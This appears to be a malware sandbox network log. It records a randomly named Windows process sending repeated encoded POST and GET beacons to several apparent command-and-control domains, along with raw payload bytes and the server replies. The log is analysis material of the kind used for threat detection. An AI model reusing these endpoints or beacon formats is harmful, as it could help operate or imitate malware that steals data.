Jan 10, 2025 19:18:21.091377974 CET	769	OUT	POST /5onp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 239 Host: www.bcg.services Origin: http://www.bcg.services Referer: http://www.bcg.services/5onp/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 45 62 71 34 6b 64 3d 56 53 46 67 77 6d 74 6e 46 6f 38 59 4a 53 4f 49 4c 71 6d 31 68 58 63 4f 38 68 35 49 74 78 57 69 6d 79 48 44 38 57 35 6a 6a 74 69 76 2f 44 4e 50 7a 6d 76 48 49 39 2b 58 33 41 74 62 32 6a 50 51 6a 47 58 73 51 65 4c 33 54 4f 43 58 4a 39 5a 6f 78 6d 77 51 66 43 48 39 69 50 62 41 76 4d 7a 47 69 37 44 2f 62 42 58 62 79 6b 71 52 6c 32 75 62 71 2b 78 56 41 55 72 6d 71 68 65 4f 53 66 36 49 52 58 39 46 74 55 6f 53 6f 44 61 36 53 79 6d 48 61 52 62 44 6b 57 58 74 36 56 6d 4d 7a 52 4c 46 33 2f 38 4b 4d 58 42 52 63 61 2f 76 4b 39 6e 79 5a 42 43 38 33 2f 4b 79 49 61 63 4f 77 33 72 48 4c 56 51 6b 49 44 37 4b 4c 2b 38 45 78 31 44 6e 68 56 77 64 78 34 63 43 30 4a 33 70 30 52 6a 56 71 78 36 45 57 72 38 3d Data Ascii: Ebq4kd=VSFgwmtnFo8YJSOILqm1hXcO8h5ItxWimyHD8W5jjtiv/DNPzmvHI9+X3Atb2jPQjGXsQeL3TOCXJ9ZoxmwQfCH9iPbAvMzGi7D/bBXbykqRl2ubq+xVAUrmqheOSf6IRX9FtUoSoDa6SymHaRbDkWXt6VmMzRLF3/8KMXBRca/vK9nyZBC83/KyIacOw3rHLVQkID7KL+8Ex1DnhVwdx4cC0J3p0RjVqx6EWr8=
Jan 10, 2025 19:18:21.545516014 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	54320	13.248.169.48	80	6160	C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:18:23.647077084 CET	1782	OUT	POST /5onp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1251 Host: www.bcg.services Origin: http://www.bcg.services Referer: http://www.bcg.services/5onp/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 45 62 71 34 6b 64 3d 56 53 46 67 77 6d 74 6e 46 6f 38 59 4a 53 4f 49 4c 71 6d 31 68 58 63 4f 38 68 35 49 74 78 57 69 6d 79 48 44 38 57 35 6a 6a 74 36 76 38 77 46 50 68 56 48 48 47 64 2b 58 37 67 74 65 32 6a 50 64 6a 43 37 67 51 65 50 4e 54 4d 36 58 4a 62 56 6f 6d 6a 63 51 57 43 48 39 67 50 62 4e 68 73 79 47 69 37 54 37 62 43 2f 62 79 6b 71 52 6c 33 2b 62 36 66 78 56 4d 30 72 70 74 68 65 61 57 66 36 67 52 57 56 56 74 55 6b 43 70 79 36 36 52 53 32 48 64 7a 6a 44 6d 32 58 76 37 56 6e 66 7a 51 33 65 33 2f 78 37 4d 58 64 37 63 61 48 76 61 36 69 57 45 7a 47 48 6f 64 72 75 42 38 56 70 6e 30 72 4d 4d 30 51 4d 4f 79 75 75 46 4f 31 78 36 6e 44 34 30 51 64 64 75 72 55 70 38 36 7a 69 6b 55 33 51 31 41 53 76 4e 4f 56 63 43 5a 6a 53 45 73 43 7a 66 38 47 43 64 6d 2f 44 46 68 7a 63 68 35 4b 4f 7a 62 5a 59 35 64 78 76 2b 58 52 5a 44 79 44 2b 6e 6c 72 49 6c 59 42 36 52 55 38 35 72 56 41 67 34 41 37 79 2b 33 79 51 56 37 78 6c 4e 73 75 61 6f 44 39 61 63 34 33 73 4f 70 49 78 38 45 41 32 31 55 53 79 32 61 36 7a 36 44 53 [TRUNCATED] Data Ascii: Ebq4kd=VSFgwmtnFo8YJSOILqm1hXcO8h5ItxWimyHD8W5jjt6v8wFPhVHHGd+X7gte2jPdjC7gQePNTM6XJbVomjcQWCH9gPbNhsyGi7T7bC/bykqRl3+b6fxVM0rptheaWf6gRWVVtUkCpy66RS2HdzjDm2Xv7VnfzQ3e3/x7MXd7caHva6iWEzGHodruB8Vpn0rMM0QMOyuuFO1x6nD40QddurUp86zikU3Q1ASvNOVcCZjSEsCzf8GCdm/DFhzch5KOzbZY5dxv+XRZDyD+nlrIlYB6RU85rVAg4A7y+3yQV7xlNsuaoD9ac43sOpIx8EA21USy2a6z6DSSbtCMWvp8kAghkGK/HLvtXC4ARjrJgvcL+bS9wopaeIXYTfFVVOryULHhR8wrKnAu/+8/7qzFWuSX14FGZaXxr6kybUbZhdftw+2QDa2jGCQe4bxZELEBbFrbiXngr5B30Q7OUO+OfJCS6CyLC7W27UENJ1nIWYiRI2oCMcimkxsiqUUR+Vco55plJNGOXirIedLPA41vsY19Zzj+3SIIzG0KVvXn2zBJL6EvHIqAJSigXulLYGYSaENtG8nh+UczUUzea5YhXp3egM2RfbAbheh9KV6zQPXndJYSHS+wi5uJKBt87bbj/UFxHT72R3QJir11CczyHcFyYfTSC1yk64WLp9CblUnEz6dfZICgw6mewxBDzzIHXOnOn5mTdFPgMrt3q3dl6ptcolnjWcrTKH0cC6x4MavesuXAQdMu5tlHcr8ZqNRPzoxb7KgwqsxkpJo56iHIkDdet/8Qzd0+XJp4PzIQu4FCXHCFbQg46hHaFPwzT0z+8Prn/6k42cbA5+EnaX9TBR3JuPE0CKZUaz49JzMHjBT9p1tFxZ9YPWTHOaNhbGyBv6X4WlUUBx5di/4nRYcqP9ZCrQCZ0WnZy7li5ucipyqlwT5CZCi2II/sy1gRktQnzEKLMiu7rLlBZRu+h0VCH4oPkCrXTiMPaOi9cZCnrBrUd [TRUNCATED]
Jan 10, 2025 19:18:24.112307072 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	54321	13.248.169.48	80	6160	C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:18:26.200822115 CET	485	OUT	GET /5onp/?Ebq4kd=YQtAzQFhELh+NSSoDqDomWI7hzIl6D7m8iHa4W14s/j18xx0uDy8MYWH0B9/yw3XqDLZco6qWp6tHax8xys+VQ7bztTOkaWbq6GbSDD5gGudwG2s7dN0Aj/drkK6Y9amBXkHtwtBoxSc&zNH=npZPFHp HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.bcg.services User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 10, 2025 19:18:32.736599922 CET	395	IN	HTTP/1.1 200 OK content-type: text/html date: Fri, 10 Jan 2025 18:18:32 GMT content-length: 274 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 45 62 71 34 6b 64 3d 59 51 74 41 7a 51 46 68 45 4c 68 2b 4e 53 53 6f 44 71 44 6f 6d 57 49 37 68 7a 49 6c 36 44 37 6d 38 69 48 61 34 57 31 34 73 2f 6a 31 38 78 78 30 75 44 79 38 4d 59 57 48 30 42 39 2f 79 77 33 58 71 44 4c 5a 63 6f 36 71 57 70 36 74 48 61 78 38 78 79 73 2b 56 51 37 62 7a 74 54 4f 6b 61 57 62 71 36 47 62 53 44 44 35 67 47 75 64 77 47 32 73 37 64 4e 30 41 6a 2f 64 72 6b 4b 36 59 39 61 6d 42 58 6b 48 74 77 74 42 6f 78 53 63 26 7a 4e 48 3d 6e 70 5a 50 46 48 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Ebq4kd=YQtAzQFhELh+NSSoDqDomWI7hzIl6D7m8iHa4W14s/j18xx0uDy8MYWH0B9/yw3XqDLZco6qWp6tHax8xys+VQ7bztTOkaWbq6GbSDD5gGudwG2s7dN0Aj/drkK6Y9amBXkHtwtBoxSc&zNH=npZPFHp"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	54322	154.23.178.231	80	6160	C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:18:54.672643900 CET	740	OUT	POST /bsyy/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 219 Host: www.43kdd.top Origin: http://www.43kdd.top Referer: http://www.43kdd.top/bsyy/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 45 62 71 34 6b 64 3d 39 2f 2b 4d 78 65 50 75 42 70 32 68 50 6c 55 34 79 33 69 4a 59 4b 51 42 54 75 74 6b 79 45 77 34 6f 48 62 45 45 71 74 57 4d 69 56 38 64 4f 73 52 31 39 75 6f 4d 4b 70 43 75 66 70 59 45 48 54 69 79 41 4f 72 4d 76 5a 65 57 44 77 34 6a 61 52 73 37 48 54 67 7a 53 61 52 36 6c 37 54 38 71 39 6e 2b 57 7a 5a 35 76 44 51 30 6d 53 72 65 49 42 6d 55 6b 34 4e 46 41 68 71 7a 57 67 7a 69 44 78 58 45 52 30 74 55 54 4b 34 4f 50 30 4d 2f 36 37 63 77 7a 4f 43 6e 66 2f 36 7a 34 5a 4b 6f 70 78 45 48 54 36 70 74 64 65 72 6a 6d 63 4e 78 62 33 6b 31 54 4b 62 78 48 69 78 6f 42 53 5a 4e 44 56 48 34 62 72 54 71 41 4c 54 52 54 59 67 30 6c 69 43 54 41 3d 3d Data Ascii: Ebq4kd=9/+MxePuBp2hPlU4y3iJYKQBTutkyEw4oHbEEqtWMiV8dOsR19uoMKpCufpYEHTiyAOrMvZeWDw4jaRs7HTgzSaR6l7T8q9n+WzZ5vDQ0mSreIBmUk4NFAhqzWgziDxXER0tUTK4OP0M/67cwzOCnf/6z4ZKopxEHT6ptderjmcNxb3k1TKbxHixoBSZNDVH4brTqALTRTYg0liCTA==
Jan 10, 2025 19:18:55.453870058 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 18:18:55 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "67811756-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	54323	154.23.178.231	80	6160	C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:18:57.325619936 CET	760	OUT	POST /bsyy/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 239 Host: www.43kdd.top Origin: http://www.43kdd.top Referer: http://www.43kdd.top/bsyy/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 45 62 71 34 6b 64 3d 39 2f 2b 4d 78 65 50 75 42 70 32 68 4f 46 45 34 2f 32 69 4a 4a 71 51 4f 63 4f 74 6b 34 6b 78 2f 6f 48 58 45 45 72 6f 4e 4d 33 6c 38 65 75 38 52 32 38 75 6f 4c 4b 70 43 68 2f 70 6e 4b 6e 54 72 79 41 44 63 4d 76 31 65 57 48 59 34 6a 66 74 73 6e 6c 37 6a 68 79 61 66 38 6c 37 52 68 36 39 6e 2b 57 7a 5a 35 76 57 31 30 6d 61 72 65 34 52 6d 56 46 34 4b 49 67 68 74 32 57 67 7a 6d 44 78 54 45 52 30 44 55 58 43 57 4f 4b 77 4d 2f 37 72 63 31 79 4f 46 74 66 2f 67 38 59 59 2f 68 73 6f 41 47 44 69 51 30 4f 36 42 73 32 31 74 77 74 32 47 76 78 47 33 76 57 61 4b 73 44 32 76 61 6c 49 79 36 61 76 4c 6e 69 2f 79 4f 6b 39 4b 35 33 44 47 46 30 32 61 32 65 67 6f 43 49 67 41 34 46 4d 37 42 78 6f 63 5a 6d 45 3d Data Ascii: Ebq4kd=9/+MxePuBp2hOFE4/2iJJqQOcOtk4kx/oHXEEroNM3l8eu8R28uoLKpCh/pnKnTryADcMv1eWHY4jftsnl7jhyaf8l7Rh69n+WzZ5vW10mare4RmVF4KIght2WgzmDxTER0DUXCWOKwM/7rc1yOFtf/g8YY/hsoAGDiQ0O6Bs21twt2GvxG3vWaKsD2valIy6avLni/yOk9K53DGF02a2egoCIgA4FM7BxocZmE=
Jan 10, 2025 19:18:58.187635899 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 18:18:58 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "67811756-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	54324	154.23.178.231	80	6160	C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:18:59.882857084 CET	1773	OUT	POST /bsyy/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1251 Host: www.43kdd.top Origin: http://www.43kdd.top Referer: http://www.43kdd.top/bsyy/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 45 62 71 34 6b 64 3d 39 2f 2b 4d 78 65 50 75 42 70 32 68 4f 46 45 34 2f 32 69 4a 4a 71 51 4f 63 4f 74 6b 34 6b 78 2f 6f 48 58 45 45 72 6f 4e 4d 33 74 38 64 64 6b 52 30 66 47 6f 4b 4b 70 43 6f 66 70 63 4b 6e 53 37 79 44 7a 59 4d 76 70 6f 57 42 63 34 69 35 35 73 72 45 37 6a 72 79 61 66 78 46 37 53 38 71 38 6a 2b 58 66 64 35 76 47 31 30 6d 61 72 65 36 5a 6d 57 55 34 4b 62 77 68 71 7a 57 67 33 69 44 78 33 45 52 38 31 55 58 48 6a 4e 35 34 4d 2f 61 62 63 33 67 6d 46 68 66 2f 2b 39 59 59 6e 68 73 73 50 47 44 2b 79 30 50 4f 72 73 31 56 74 78 38 50 35 7a 43 79 68 30 6e 61 69 74 6a 6d 71 50 6d 67 38 30 73 58 67 35 56 4b 56 43 6e 4e 38 68 46 76 76 42 77 79 65 76 49 4e 58 4b 73 63 7a 2b 79 4a 56 46 42 77 2b 45 7a 39 42 69 44 39 38 36 44 2f 4d 39 4c 7a 70 47 66 6e 47 33 33 55 4b 5a 6e 7a 64 43 71 6a 4c 74 6c 54 41 68 38 63 2f 73 51 79 7a 55 76 62 57 66 41 6d 62 41 62 68 31 56 56 51 36 4d 58 69 45 61 72 42 73 63 63 77 74 71 48 4c 42 6e 37 68 33 31 47 2b 61 61 36 52 37 78 73 68 4b 57 58 53 47 4c 45 52 59 58 61 78 [TRUNCATED] Data Ascii: Ebq4kd=9/+MxePuBp2hOFE4/2iJJqQOcOtk4kx/oHXEEroNM3t8ddkR0fGoKKpCofpcKnS7yDzYMvpoWBc4i55srE7jryafxF7S8q8j+Xfd5vG10mare6ZmWU4KbwhqzWg3iDx3ER81UXHjN54M/abc3gmFhf/+9YYnhssPGD+y0POrs1Vtx8P5zCyh0naitjmqPmg80sXg5VKVCnN8hFvvBwyevINXKscz+yJVFBw+Ez9BiD986D/M9LzpGfnG33UKZnzdCqjLtlTAh8c/sQyzUvbWfAmbAbh1VVQ6MXiEarBsccwtqHLBn7h31G+aa6R7xshKWXSGLERYXaxC6vXwU86NN96RSko7nRrun9iQc2RLRSQmR6I5iHSGXCrZ3B2xFqkdf7/6WbcLrlkcAh4OR8keTDrqZ/aIIcPp5f3WZFWfZfQAgCqunSUIMPeTR4cUhnPt1MZqSmKkjPiEva/nrDkF2xG5sCUTUPOzzrj9teWZKNeBAQOY70gKJ+Oo7WxDz87mra99CS+l6cIApKhW8V1XfDrkJzBD09CZbnogqkYYfkv42elyh3edsfKb/O7Ed8C0ayra+KcqZF+N04ghYZTL6+1RquiKCyV5SRvaPx1c2le8pfgqymGYJVAHEslCgsGFSowCOZg3nYmIAElgdClaF4LkAA9L9PK/EaBfZecq0USBMjwPtLUUOntFJrZQCJI6KPim7sYdA5oaIiRStiBM5fwR1376OITNEGv2QH+DjqxsJzLlJ8hbfno4YbZOg5iKViVSlv/ElM9RApS0BljvfxeEeVndimM1MZWTHTf0GKKC5stOOPGSQzh7hqt24cD4Q1KsQhQEnvYmhQOaf9j3+cKn3VHHDBC8tSJE/6cen0YkW6HGom7OdPpaWxWB2cF7YilSQazaZ0S0MYqOF+BUzPV5gs6sbu899cQ9N5yI6IkSb2GH1qvddhP+yD9Va+jS0oACyAFqu/jssbJNqGvD3eYFLIIk9ZR+s0YJsqnM9/a2Y [TRUNCATED]
Jan 10, 2025 19:19:00.777610064 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 18:19:00 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "67811756-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	54325	154.23.178.231	80	6160	C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:19:02.425019979 CET	482	OUT	GET /bsyy/?zNH=npZPFHp&Ebq4kd=w9Wsyrfddra1GxcU+lvvJ4oQD8tz6DR/pSTnVJEXbHEmdfQx+6bPNdVPoslsCSigyUnMPNoyb3wBtIJwqnPVsz+Ro0OM8Jd88jKv7OGJqHGxaYpNVHYIOGV13jdXqVR/FDBUfHDkP5ob HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.43kdd.top User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 10, 2025 19:19:03.329010010 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 18:19:03 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "67811756-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	54326	130.185.109.77	80	6160	C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:19:08.400428057 CET	758	OUT	POST /cv1w/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 219 Host: www.lgdiamonds.info Origin: http://www.lgdiamonds.info Referer: http://www.lgdiamonds.info/cv1w/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 45 62 71 34 6b 64 3d 48 4b 35 36 44 30 5a 68 2f 66 2b 48 6d 6b 4f 63 6a 50 53 2b 4c 4f 52 48 72 49 30 6c 6a 6d 4a 64 61 59 49 53 6d 31 7a 59 34 56 35 67 30 56 44 69 71 55 67 53 66 34 75 76 4b 35 68 57 5a 70 65 39 6f 66 47 78 58 50 6f 44 69 34 43 49 70 70 4c 78 68 7a 62 4b 6c 42 72 78 58 72 75 39 57 54 76 64 33 65 36 64 45 55 62 47 2b 51 6e 2f 76 69 39 61 50 53 77 44 69 41 52 6a 6a 2b 78 76 77 75 48 4f 53 4f 66 39 37 66 59 77 43 4e 44 77 76 6a 2f 53 79 58 46 6c 2b 2b 6b 34 34 75 4f 59 5a 35 44 6c 44 2f 43 75 63 49 43 5a 72 72 36 79 69 43 4e 58 6f 36 45 65 76 59 6c 43 44 62 62 79 73 4b 69 35 71 30 33 67 5a 74 4e 73 75 38 4e 72 78 54 30 6b 76 67 3d 3d Data Ascii: Ebq4kd=HK56D0Zh/f+HmkOcjPS+LORHrI0ljmJdaYISm1zY4V5g0VDiqUgSf4uvK5hWZpe9ofGxXPoDi4CIppLxhzbKlBrxXru9WTvd3e6dEUbG+Qn/vi9aPSwDiARjj+xvwuHOSOf97fYwCNDwvj/SyXFl++k44uOYZ5DlD/CucICZrr6yiCNXo6EevYlCDbbysKi5q03gZtNsu8NrxT0kvg==
Jan 10, 2025 19:19:08.999353886 CET	322	IN	HTTP/1.1 404 Not Found Server: nginx/1.6.2 Date: Fri, 10 Jan 2025 18:19:08 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T$'gd*HN+I-0D7(bTgU!2S>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	54327	130.185.109.77	80	6160	C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:19:10.946492910 CET	778	OUT	POST /cv1w/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 239 Host: www.lgdiamonds.info Origin: http://www.lgdiamonds.info Referer: http://www.lgdiamonds.info/cv1w/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 45 62 71 34 6b 64 3d 48 4b 35 36 44 30 5a 68 2f 66 2b 48 6b 45 2b 63 6c 75 53 2b 63 65 52 47 6c 6f 30 6c 34 57 4a 5a 61 59 55 53 6d 78 71 41 35 6e 74 67 30 30 7a 69 72 51 4d 53 63 34 75 76 43 5a 67 39 58 4a 66 2f 6f 66 36 35 58 4b 51 44 69 38 71 49 70 72 44 78 68 43 62 4e 6a 52 72 7a 61 4c 76 62 53 54 76 64 33 65 36 64 45 55 50 34 2b 51 2f 2f 75 53 4e 61 50 7a 77 41 2b 51 52 73 72 65 78 76 36 2b 48 4b 53 4f 65 48 37 62 59 4b 43 50 37 77 76 69 50 53 78 43 78 6d 30 2b 6b 2b 79 4f 50 75 52 5a 57 54 4a 36 79 78 64 61 79 45 72 62 2b 4f 6a 30 4d 31 79 59 49 79 78 4a 64 35 48 5a 2f 45 37 73 2f 4d 6f 31 7a 34 55 50 35 4e 78 4c 6f 42 38 42 56 67 35 54 59 6e 63 35 2b 46 39 38 45 53 52 50 69 70 33 47 50 4c 71 4e 6b 3d Data Ascii: 